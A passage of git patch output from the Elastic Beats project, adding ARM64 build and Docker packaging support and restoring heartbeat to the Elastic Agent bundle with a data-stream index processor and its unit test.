sh.RunWith(map[string]string{"CGO_ENABLED": "0"}, "mage", "-f", "-goos=linux", "-goarch="+arch, + "-compile", CreateDir(filepath.Join("build", "mage-linux-"+arch))) } func crossBuildImage(platform string) (string, error) { @@ -185,6 +201,9 @@ func crossBuildImage(platform string) (string, error) { tagSuffix = "darwin" case strings.HasPrefix(platform, "linux/arm"): tagSuffix = "arm" + if runtime.GOARCH == "arm64" { + tagSuffix = "base-arm-debian9" + } case strings.HasPrefix(platform, "linux/mips"): tagSuffix = "mips" case strings.HasPrefix(platform, "linux/ppc"): @@ -231,9 +250,10 @@ func (b GolangCrossBuilder) Build() error { } workDir := filepath.ToSlash(filepath.Join(mountPoint, cwd)) - buildCmd, err := filepath.Rel(workDir, filepath.Join(mountPoint, repoInfo.SubDir, "build/mage-linux-amd64")) + builderArch := runtime.GOARCH + buildCmd, err := filepath.Rel(workDir, filepath.Join(mountPoint, repoInfo.SubDir, "build/mage-linux-"+builderArch)) if err != nil { - return errors.Wrap(err, "failed to determine mage-linux-amd64 relative path") + return errors.Wrap(err, "failed to determine mage-linux-"+builderArch+" relative path") } dockerRun := sh.RunCmd("docker", "run") diff --git a/dev-tools/mage/dockerbuilder.go b/dev-tools/mage/dockerbuilder.go index 503fcae9cfc2..d02abad2c576 100644 --- a/dev-tools/mage/dockerbuilder.go +++ b/dev-tools/mage/dockerbuilder.go @@ -70,15 +70,17 @@ func (b *dockerBuilder) Build() error { return errors.Wrap(err, "failed to prepare build") } + tries := 3 tag, err := b.dockerBuild() - if err != nil { + for err != nil && tries != 0 { fmt.Println(">> Building docker images again (after 10 seconds)") // This sleep is to avoid hitting the docker build issues when resources are not available. time.Sleep(10) tag, err = b.dockerBuild() - if err != nil { - return errors.Wrap(err, "failed to build docker") - } + tries -= 1 + } + if err != nil { + return errors.Wrap(err, "failed to build docker") } if err := b.dockerSave(tag); err != nil { @@ -199,6 +201,12 @@ func (b *dockerBuilder) dockerBuild() (string, error) { } func (b *dockerBuilder) dockerSave(tag string) error { + if _, err := os.Stat(distributionsDir); os.IsNotExist(err) { + err := os.MkdirAll(distributionsDir, 0750) + if err != nil { + return fmt.Errorf("cannot create folder for docker artifacts: %+v", err) + } + } // Save the container as artifact outputFile := b.OutputFile if outputFile == "" { diff --git a/dev-tools/mage/pkg.go b/dev-tools/mage/pkg.go index 4ecdec89d39a..2341724b3509 100644 --- a/dev-tools/mage/pkg.go +++ b/dev-tools/mage/pkg.go @@ -45,16 +45,26 @@ func Package() error { var tasks []interface{} for _, target := range Platforms { for _, pkg := range Packages { - if pkg.OS != target.GOOS() { + if pkg.OS != target.GOOS() || pkg.Arch != "" && pkg.Arch != target.Arch() { continue } for _, pkgType := range pkg.Types { + if !isPackageTypeSelected(pkgType) { + log.Printf("Skipping %s package type because it is not selected", pkgType) + continue + } + if pkgType == DMG && runtime.GOOS != "darwin" { log.Printf("Skipping DMG package type because build host isn't darwin") continue } + if target.Name == "linux/arm64" && pkgType == Docker && runtime.GOARCH != "arm64" { + log.Printf("Skipping Docker package type because build host isn't arm") + continue + } + packageArch, err := getOSArchName(target, pkgType) if err != nil { log.Printf("Skipping arch %v for package type %v: %v", target.Arch(), pkgType, err) @@ -106,6 +116,19 @@ func Package() error { return nil } +func isPackageTypeSelected(pkgType PackageType) bool { + if SelectedPackageTypes != nil { + selected := false + for _, t := range SelectedPackageTypes { + if t == pkgType { + selected = true + } + } + return selected + } + return true +} + type packageBuilder struct { Platform BuildPlatform Spec PackageSpec diff --git a/dev-tools/mage/pkgtypes.go b/dev-tools/mage/pkgtypes.go index b7f7c7bbbee8..ece8b73bfabc 100644 --- a/dev-tools/mage/pkgtypes.go +++ b/dev-tools/mage/pkgtypes.go @@ -68,6 +68,7 @@ const ( // system using the contained PackageSpec. type OSPackageArgs struct { OS string `yaml:"os"` + Arch string `yaml:"arch,omitempty"` Types []PackageType `yaml:"types"` Spec PackageSpec `yaml:"spec"` } @@ -172,6 +173,7 @@ var OSArchNames = map[string]map[PackageType]map[string]string{ }, Docker: map[string]string{ "amd64": "amd64", + "arm64": "arm64", }, }, } diff --git a/dev-tools/packaging/packages.yml b/dev-tools/packaging/packages.yml index 53a6573bfd5b..827ad577d0de 100644 --- a/dev-tools/packaging/packages.yml +++ b/dev-tools/packaging/packages.yml @@ -402,6 +402,12 @@ shared: {{ commit }} mode: 0644 + - &agent_docker_arm_spec + <<: *agent_docker_spec + extra_vars: + from: 'arm64v8/centos:7' + buildFrom: 'arm64v8/centos:7' + # Deb/RPM spec for community beats. - &deb_rpm_spec <<: *common @@ -556,11 +562,22 @@ shared: mode: 0600 config: true + - &docker_arm_spec + <<: *docker_spec + extra_vars: + from: 'arm64v8/centos:7' + buildFrom: 'arm64v8/centos:7' + - &docker_ubi_spec extra_vars: image_name: '{{.BeatName}}-ubi8' from: 'docker.elastic.co/ubi8/ubi-minimal' + - &docker_arm_ubi_spec + extra_vars: + image_name: '{{.BeatName}}-ubi8' + from: 'registry.access.redhat.com/ubi8/ubi-minimal:8.2' + - &elastic_docker_spec extra_vars: repository: 'docker.elastic.co/beats' @@ -724,17 +741,20 @@ specs: <<: *elastic_license_for_deb_rpm - os: linux + arch: amd64 types: [docker] spec: <<: *docker_spec + <<: *docker_ubi_spec <<: *elastic_docker_spec <<: *elastic_license_for_binaries - os: linux + arch: arm64 types: [docker] spec: - <<: *docker_spec - <<: *docker_ubi_spec + <<: *docker_arm_spec + <<: *docker_arm_ubi_spec <<: *elastic_docker_spec <<: *elastic_license_for_binaries @@ -813,9 +833,11 @@ specs: source: ./{{.XPackDir}}/{{.BeatName}}/build/golang-crossbuild/{{.BeatName}}-{{.GOOS}}-{{.Platform.Arch}}{{.BinaryExt}} - os: linux + arch: amd64 types: [docker] spec: <<: *docker_spec + <<: *docker_ubi_spec <<: *elastic_docker_spec <<: *elastic_license_for_binaries files: @@ -823,10 +845,11 @@ specs: source: ./{{.XPackDir}}/{{.BeatName}}/build/golang-crossbuild/{{.BeatName}}-{{.GOOS}}-{{.Platform.Arch}}{{.BinaryExt}} - os: linux + arch: arm64 types: [docker] spec: - <<: *docker_spec - <<: *docker_ubi_spec + <<: *docker_arm_spec + <<: *docker_arm_ubi_spec <<: *elastic_docker_spec <<: *elastic_license_for_binaries files: @@ -892,9 +915,11 @@ specs: mode: 0755 - os: linux + arch: amd64 types: [docker] spec: <<: *agent_docker_spec + <<: *docker_ubi_spec <<: *elastic_docker_spec <<: *elastic_license_for_binaries files: @@ -902,10 +927,11 @@ specs: source: ./build/golang-crossbuild/{{.BeatName}}-{{.GOOS}}-{{.Platform.Arch}}{{.BinaryExt}} - os: linux + arch: arm64 types: [docker] spec: - <<: *agent_docker_spec - <<: *docker_ubi_spec + <<: *agent_docker_arm_spec + <<: *docker_arm_ubi_spec <<: *elastic_docker_spec <<: *elastic_license_for_binaries files: diff --git a/dev-tools/packaging/templates/docker/Dockerfile.elastic-agent.tmpl b/dev-tools/packaging/templates/docker/Dockerfile.elastic-agent.tmpl index 844192627c67..cf2788af09ed 100644 --- a/dev-tools/packaging/templates/docker/Dockerfile.elastic-agent.tmpl +++ b/dev-tools/packaging/templates/docker/Dockerfile.elastic-agent.tmpl @@ -28,9 +28,7 @@ RUN mkdir -p {{ $beatHome }}/data {{ $beatHome }}/data/elastic-agent-{{ commit_s FROM {{ .from }} {{- if contains .from "ubi-minimal" }} -RUN for iter in {1..10}; do microdnf update -y && microdnf install -y shadow-utils && microdnf clean all && exit_code=0 && break || exit_code=$? && echo "microdnf error: retry $iter in 10s" && sleep 10; done; (exit $exit_code) -RUN curl -L https://github.com/stedolan/jq/releases/download/jq-1.6/jq-linux64 -o /usr/local/bin/jq && \ - chmod +x /usr/local/bin/jq +RUN for iter in {1..10}; do microdnf update -y && microdnf install -y shadow-utils jq && microdnf clean all && exit_code=0 && break || exit_code=$? && echo "microdnf error: retry $iter in 10s" && sleep 10; done; (exit $exit_code) {{- else }} # Installing jq needs to be installed after epel-release and cannot be in the same yum install command. RUN for iter in {1..10}; do yum update --setopt=tsflags=nodocs -y && yum install --setopt=tsflags=nodocs -y epel-release && yum clean all && exit_code=0 && break || exit_code=$? && echo "yum error: retry $iter in 10s" && sleep 10; done; (exit $exit_code) @@ -69,9 +67,22 @@ ENV GODEBUG="madvdontneed=1" # Add an init process, check the checksum to make sure it's a match RUN set -e ; \ - TINI_VERSION='v0.19.0' ; \ - TINI_BIN='tini-amd64' ; \ - TINI_SHA256='93dcc18adc78c65a028a84799ecf8ad40c936fdfc5f2a57b1acda5a8117fa82c' ; \ + TINI_BIN=""; \ + TINI_SHA256=""; \ + TINI_VERSION="v0.19.0"; \ + case "$(arch)" in \ + x86_64) \ + TINI_BIN="tini-amd64"; \ + TINI_SHA256="93dcc18adc78c65a028a84799ecf8ad40c936fdfc5f2a57b1acda5a8117fa82c"; \ + ;; \ + aarch64) \ + TINI_BIN="tini-arm64"; \ + TINI_SHA256="07952557df20bfd2a95f9bef198b445e006171969499a1d361bd9e6f8e5e0e81"; \ + ;; \ + *) \ + echo >&2 ; echo >&2 "Unsupported architecture \$(arch)" ; echo >&2 ; exit 1 ; \ + ;; \ + esac ; \ curl --retry 8 -S -L -O "https://github.com/krallin/tini/releases/download/${TINI_VERSION}/${TINI_BIN}" ; \ echo "${TINI_SHA256} ${TINI_BIN}" | sha256sum -c - ; \ mv "${TINI_BIN}" /usr/bin/tini ; \ diff --git a/dev-tools/packaging/templates/docker/Dockerfile.tmpl b/dev-tools/packaging/templates/docker/Dockerfile.tmpl index e42e525644c0..26302f0d1791 100644 --- a/dev-tools/packaging/templates/docker/Dockerfile.tmpl +++ b/dev-tools/packaging/templates/docker/Dockerfile.tmpl @@ -31,10 +31,10 @@ RUN microdnf -y --setopt=tsflags=nodocs update && \ RUN yum -y --setopt=tsflags=nodocs update \ {{- if (eq .BeatName "heartbeat") }} && yum -y install epel-release \ - && yum -y install atk cups gtk gdk xrandr pango.x86_64 libXcomposite.x86_64 libXcursor.x86_64 libXdamage.x86_64 \ - libXext.x86_64 libXi.x86_64 libXtst.x86_64 cups-libs.x86_64 libXScrnSaver.x86_64 libXrandr.x86_64 GConf2.x86_64 \ - alsa-lib.x86_64 atk.x86_64 gtk3.x86_64 ipa-gothic-fonts xorg-x11-fonts-100dpi xorg-x11-fonts-75dpi xorg-x11-utils \ - xorg-x11-fonts-cyrillic xorg-x11-fonts-Type1 xorg-x11-fonts-misc \ + && yum -y install atk cups gtk gdk xrandr pango libXcomposite libXcursor libXdamage \ + libXext libXi libXtst cups-libs libXScrnSaver libXrandr GConf2 \ + alsa-lib atk gtk3 ipa-gothic-fonts xorg-x11-fonts-100dpi xorg-x11-fonts-75dpi xorg-x11-utils \ + xorg-x11-fonts-cyrillic xorg-x11-fonts-Type1 xorg-x11-fonts-misc \ {{- end }} && yum clean all && rm -rf /var/cache/yum # See https://access.redhat.com/discussions/3195102 for why rm is needed @@ -83,9 +83,22 @@ ENV GODEBUG="madvdontneed=1" # Add an init process, check the checksum to make sure it's a match RUN set -e ; \ - TINI_VERSION='v0.19.0' ; \ - TINI_BIN='tini-amd64' ; \ - TINI_SHA256='93dcc18adc78c65a028a84799ecf8ad40c936fdfc5f2a57b1acda5a8117fa82c' ; \ + TINI_BIN=""; \ + TINI_SHA256=""; \ + TINI_VERSION="v0.19.0"; \ + case "$(arch)" in \ + x86_64) \ + TINI_BIN="tini-amd64"; \ + TINI_SHA256="93dcc18adc78c65a028a84799ecf8ad40c936fdfc5f2a57b1acda5a8117fa82c"; \ + ;; \ + aarch64) \ + TINI_BIN="tini-arm64"; \ + TINI_SHA256="07952557df20bfd2a95f9bef198b445e006171969499a1d361bd9e6f8e5e0e81"; \ + ;; \ + *) \ + echo >&2 ; echo >&2 "Unsupported architecture \$(arch)" ; echo >&2 ; exit 1 ; \ + ;; \ + esac ; \ curl --retry 8 -S -L -O "https://github.com/krallin/tini/releases/download/${TINI_VERSION}/${TINI_BIN}" ; \ echo "${TINI_SHA256} ${TINI_BIN}" | sha256sum -c - ; \ mv "${TINI_BIN}" /usr/bin/tini ; \ @@ -119,8 +132,20 @@ ENV PATH="$NODE_PATH/node/bin:$PATH" # cached node_modules, heartbeat then calls the global executable to run test suites # Setup node RUN cd /usr/share/heartbeat/.node \ + && NODE_DOWNLOAD_URL="" \ + && case "$(arch)" in \ + x86_64) \ + NODE_DOWNLOAD_URL=https://nodejs.org/dist/v${NODE_VERSION}/node-v${NODE_VERSION}-linux-x64.tar.xz \ + ;; \ + aarch64) \ + NODE_DOWNLOAD_URL=https://nodejs.org/dist/v${NODE_VERSION}/node-v${NODE_VERSION}-linux-arm64.tar.xz \ + ;; \ + *) \ + echo >&2 ; echo >&2 "Unsupported architecture \$(arch)" ; echo >&2 ; exit 1 ; \ + ;; \ + esac \ && mkdir -p node \ - && curl https://nodejs.org/dist/v12.18.4/node-v12.18.4-linux-x64.tar.xz | tar -xJ --strip 1 -C node \ + && curl ${NODE_DOWNLOAD_URL} | tar -xJ --strip 1 -C node \ && chmod ug+rwX -R $NODE_PATH \ && npm i -g -f @elastic/synthetics && chmod ug+rwX -R $NODE_PATH {{- end }} diff --git a/journalbeat/magefile.go b/journalbeat/magefile.go index 0644ce7d275f..46d962c69b42 100644 --- a/journalbeat/magefile.go +++ b/journalbeat/magefile.go @@ -21,6 +21,7 @@ package main import ( "fmt" + "runtime" "strings" "time" @@ -138,6 +139,9 @@ func selectImage(platform string) (string, error) { switch { case strings.HasPrefix(platform, "linux/arm"): tagSuffix = "arm" + if runtime.GOARCH == "arm64" { + tagSuffix = "base-arm-debian9" + } case strings.HasPrefix(platform, "linux/mips"): tagSuffix = "mips" case strings.HasPrefix(platform, "linux/ppc"): diff --git a/script/fix_permissions.sh b/script/fix_permissions.sh index fd65a7916b50..fce5067f7279 100755 --- a/script/fix_permissions.sh +++ b/script/fix_permissions.sh @@ -5,7 +5,14 @@ readonly LOCATION="${1?Please define the path where the fix permissions should r if ! docker version ; then echo "It requires Docker daemon to be installed and running" else + ## Detect architecture to support ARM specific docker images. + ARCH=$(uname -m| tr '[:upper:]' '[:lower:]') + if [ "${ARCH}" == "aarch64" ] ; then + DOCKER_IMAGE=arm64v8/alpine:3 + else + DOCKER_IMAGE=alpine:3.4 + fi set -e # Change ownership of all files inside the specific folder from root/root to current user/group - docker run -v ${LOCATION}:/beat alpine:3.4 sh -c "find /beat -user 0 -exec chown -h $(id -u):$(id -g) {} \;" + docker run -v "${LOCATION}":/beat ${DOCKER_IMAGE} sh -c "find /beat -user 0 -exec chown -h $(id -u):$(id -g) {} \;" fi diff --git a/x-pack/elastic-agent/magefile.go b/x-pack/elastic-agent/magefile.go index fad5ef935aac..3918b6da4033 100644 --- a/x-pack/elastic-agent/magefile.go +++ b/x-pack/elastic-agent/magefile.go @@ -591,6 +591,9 @@ func packageAgent(requiredPackages []string, packagingFn func()) { cmd.Stdout = os.Stdout cmd.Stderr = os.Stderr cmd.Env = append(os.Environ(), fmt.Sprintf("PWD=%s", pwd), "AGENT_PACKAGING=on") + if envVar := selectedPackageTypes(); envVar != "" { + cmd.Env = append(cmd.Env, envVar) + } if err := cmd.Run(); err != nil { panic(err) @@ -613,6 +616,22 @@ func packageAgent(requiredPackages []string, packagingFn func()) { mg.SerialDeps(devtools.Package, TestPackages) } +func selectedPackageTypes() string { + if len(devtools.SelectedPackageTypes) == 0 { + return "" + } + + envVar := "PACKAGES=" + for _, p := range devtools.SelectedPackageTypes { + if p == devtools.Docker { + envVar += "targz," + } else { + envVar += p.String() + "," + } + } + return envVar[:len(envVar)-1] +} + func copyAll(from, to string) error { return filepath.Walk(from, func(path string, info os.FileInfo, err error) error { if err != nil { From f87eac2b46330ca0cbbf471ddbc197f5f33d2a56 Mon Sep 17 00:00:00 2001 From: Shahzad Date: Mon, 8 Feb 2021 21:55:49 +0100 Subject: [PATCH 10/63] Revert "[Agent] Remove heartbeat from bundled beats in agent." (#22695) Co-authored-by: Andrew Cholakian --- dev-tools/packaging/packages.yml | 41 +++++++++ heartbeat/monitors/factory.go | 78 +++++++++++++--- heartbeat/monitors/factory_test.go | 96 ++++++++++++++++++++ x-pack/elastic-agent/CHANGELOG.next.asciidoc | 1 + x-pack/elastic-agent/magefile.go | 2 +- 5 files changed, 204 insertions(+), 14 deletions(-) create mode 100644 heartbeat/monitors/factory_test.go diff --git a/dev-tools/packaging/packages.yml b/dev-tools/packaging/packages.yml index 827ad577d0de..cac561883cd5 100644 --- a/dev-tools/packaging/packages.yml +++ b/dev-tools/packaging/packages.yml @@ -74,6 +74,16 @@ shared: source: '{{.AgentDropPath}}/filebeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.asc' mode: 0644 skip_on_missing: true + /var/lib/{{.BeatName}}/data/{{.BeatName}}-{{ commit_short }}/downloads/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz: + source: '{{.AgentDropPath}}/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz' + mode: 0644 + /var/lib/{{.BeatName}}/data/{{.BeatName}}-{{ commit_short }}/downloads/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.sha512: + source: '{{.AgentDropPath}}/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.sha512' + mode: 0644 + /var/lib/{{.BeatName}}/data/{{.BeatName}}-{{ commit_short }}/downloads/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.asc: + source: '{{.AgentDropPath}}/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.asc' + mode: 0644 + skip_on_missing: true /var/lib/{{.BeatName}}/data/{{.BeatName}}-{{ commit_short }}/downloads/metricbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz: source: '{{.AgentDropPath}}/metricbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz' mode: 0644 @@ -179,6 +189,17 @@ shared: source: '{{.AgentDropPath}}/filebeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.asc' mode: 0644 skip_on_missing: true + /etc/{{.BeatName}}/data/{{.BeatName}}-{{ commit_short }}/downloads/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz: + source: '{{.AgentDropPath}}/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz' + mode: 0644 + /etc/{{.BeatName}}/data/{{.BeatName}}-{{ commit_short }}/downloads/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.sha512: + source: '{{.AgentDropPath}}/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.sha512' + mode: 0644 + skip_on_missing: true + /etc/{{.BeatName}}/data/{{.BeatName}}-{{ commit_short }}/downloads/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.asc: + source: '{{.AgentDropPath}}/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.asc' + mode: 0644 + skip_on_missing: true /etc/{{.BeatName}}/data/{{.BeatName}}-{{ commit_short }}/downloads/metricbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz: source: '{{.AgentDropPath}}/metricbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz' mode: 0644 @@ -273,6 +294,16 @@ shared: source: '{{.AgentDropPath}}/filebeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.asc' mode: 0644 skip_on_missing: true + 'data/{{.BeatName}}-{{ commit_short }}/downloads/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz': + source: '{{.AgentDropPath}}/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz' + mode: 0644 + 'data/{{.BeatName}}-{{ commit_short }}/downloads/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.sha512': + source: '{{.AgentDropPath}}/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.sha512' + mode: 0644 + 'data/{{.BeatName}}-{{ commit_short }}/downloads/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.asc': + source: '{{.AgentDropPath}}/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.asc' + mode: 0644 + skip_on_missing: true 'data/{{.BeatName}}-{{ commit_short }}/downloads/metricbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz': source: '{{.AgentDropPath}}/metricbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz' mode: 0644 @@ -336,6 +367,16 @@ shared: source: '{{.AgentDropPath}}/filebeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.zip.asc' mode: 0644 skip_on_missing: true + 'data/{{.BeatName}}-{{ commit_short }}/downloads/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.zip': + source: '{{.AgentDropPath}}/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.zip' + mode: 0644 + 'data/{{.BeatName}}-{{ commit_short }}/downloads/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.zip.sha512': + source: '{{.AgentDropPath}}/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.zip.sha512' + mode: 0644 + 'data/{{.BeatName}}-{{ commit_short }}/downloads/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.zip.asc': + source: '{{.AgentDropPath}}/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.zip.asc' + mode: 0644 + skip_on_missing: true 'data/{{.BeatName}}-{{ commit_short }}/downloads/metricbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.zip': source: '{{.AgentDropPath}}/metricbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.zip' mode: 0644 diff --git a/heartbeat/monitors/factory.go b/heartbeat/monitors/factory.go index 10d039d0830f..5e54eca78fed 100644 --- a/heartbeat/monitors/factory.go +++ b/heartbeat/monitors/factory.go @@ -18,6 +18,8 @@ package monitors import ( + "fmt" + "github.com/elastic/beats/v7/heartbeat/scheduler" "github.com/elastic/beats/v7/libbeat/beat" "github.com/elastic/beats/v7/libbeat/cfgfile" @@ -50,9 +52,16 @@ type publishSettings struct { KeepNull bool `config:"keep_null"` // Output meta data settings - Pipeline string `config:"pipeline"` // ES Ingest pipeline name - Index fmtstr.EventFormatString `config:"index"` // ES output index pattern - DataSet string `config:"dataset"` + Pipeline string `config:"pipeline"` // ES Ingest pipeline name + Index fmtstr.EventFormatString `config:"index"` // ES output index pattern + DataStream *datastream `config:"data_stream"` + DataSet string `config:"dataset"` +} + +type datastream struct { + Namespace string `config:"namespace"` + Dataset string `config:"dataset"` + Type string `config:"type"` } // NewFactory takes a scheduler and creates a RunnerFactory that can create cfgfile.Runner(Monitor) objects. @@ -83,15 +92,9 @@ func newCommonPublishConfigs(info beat.Info, cfg *common.Config) (pipetool.Confi return nil, err } - var indexProcessor processors.Processor - if !settings.Index.IsEmpty() { - staticFields := fmtstr.FieldsForBeat(info.Beat, info.Version) - timestampFormat, err := - fmtstr.NewTimestampFormatString(&settings.Index, staticFields) - if err != nil { - return nil, err - } - indexProcessor = add_formatted_index.New(timestampFormat) + indexProcessor, err := setupIndexProcessor(info, settings) + if err != nil { + return nil, err } userProcessors, err := processors.New(settings.Processors) @@ -99,9 +102,14 @@ func newCommonPublishConfigs(info beat.Info, cfg *common.Config) (pipetool.Confi return nil, err } + // TODO: Remove this logic in the 8.0/master branch, preserve only in 7.x dataset := settings.DataSet if dataset == "" { - dataset = "uptime" + if settings.DataStream != nil && settings.DataStream.Dataset != "" { + dataset = settings.DataStream.Dataset + } else { + dataset = "uptime" + } } return func(clientCfg beat.ClientConfig) (beat.ClientConfig, error) { @@ -140,3 +148,47 @@ func newCommonPublishConfigs(info beat.Info, cfg *common.Config) (pipetool.Confi return clientCfg, nil }, nil } + +func setupIndexProcessor(info beat.Info, settings publishSettings) (processors.Processor, error) { + var indexProcessor processors.Processor + if settings.DataStream != nil { + namespace := settings.DataStream.Namespace + if namespace == "" { + namespace = "default" + } + typ := settings.DataStream.Type + if typ == "" { + typ = "synthetics" + } + + dataset := settings.DataStream.Dataset + if dataset == "" { + dataset = "generic" + } + + index := fmt.Sprintf( + "%s-%s-%s", + typ, + dataset, + namespace, + ) + compiled, err := fmtstr.CompileEvent(index) + if err != nil { + return nil, fmt.Errorf("could not compile datastream: '%s', this should never happen: %w", index, err) + } else { + settings.Index = *compiled + } + } + + if !settings.Index.IsEmpty() { + staticFields := fmtstr.FieldsForBeat(info.Beat, info.Version) + + timestampFormat, err := + fmtstr.NewTimestampFormatString(&settings.Index, staticFields) + if err != nil { + return nil, err + } + indexProcessor = add_formatted_index.New(timestampFormat) + } + return indexProcessor, nil +} diff --git a/heartbeat/monitors/factory_test.go b/heartbeat/monitors/factory_test.go new file mode 100644 index 000000000000..caa681985d7a --- /dev/null +++ b/heartbeat/monitors/factory_test.go @@ -0,0 +1,96 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package monitors + +import ( + "testing" + + "github.com/stretchr/testify/require" + + "github.com/elastic/beats/v7/libbeat/beat" + "github.com/elastic/beats/v7/libbeat/beat/events" + "github.com/elastic/beats/v7/libbeat/common" + "github.com/elastic/beats/v7/libbeat/common/fmtstr" +) + +func TestSetupIndexProcessor(t *testing.T) { + binfo := beat.Info{ + Beat: "heartbeat", + IndexPrefix: "heartbeat", + Version: "8.0.0", + } + tests := map[string]struct { + settings publishSettings + expectedIndex string + wantProc bool + wantErr bool + }{ + "no settings should yield no processor": { + publishSettings{}, + "", + false, + false, + }, + "exact index should be used exactly": { + publishSettings{Index: *fmtstr.MustCompileEvent("test")}, + "test", + true, + false, + }, + "data stream should be type-namespace-dataset": { + publishSettings{ + DataStream: &datastream{ + Type: "myType", + Dataset: "myDataset", + Namespace: "myNamespace", + }, + }, + "myType-myDataset-myNamespace", + true, + false, + }, + "data stream should use defaults": { + publishSettings{ + DataStream: &datastream{}, + }, + "synthetics-generic-default", + true, + false, + }, + } + + for name, tt := range tests { + t.Run(name, func(t *testing.T) { + e := beat.Event{Meta: common.MapStr{}, Fields: common.MapStr{}} + proc, err := setupIndexProcessor(binfo, tt.settings) + if tt.wantErr == true { + require.Error(t, err) + return + } + require.NoError(t, err) + + if !tt.wantProc { + require.Nil(t, proc) + return + } + + _, err = proc.Run(&e) + require.Equal(t, tt.expectedIndex, e.Meta[events.FieldMetaRawIndex]) + }) + } +} diff --git a/x-pack/elastic-agent/CHANGELOG.next.asciidoc b/x-pack/elastic-agent/CHANGELOG.next.asciidoc index f1f8c39d7fdc..3d2d4551475a 100644 --- a/x-pack/elastic-agent/CHANGELOG.next.asciidoc +++ b/x-pack/elastic-agent/CHANGELOG.next.asciidoc @@ -44,6 +44,7 @@ - Improved version CLI {pull}20359[20359] - Enroll CLI now restarts running daemon {pull}20359[20359] - Add restart CLI 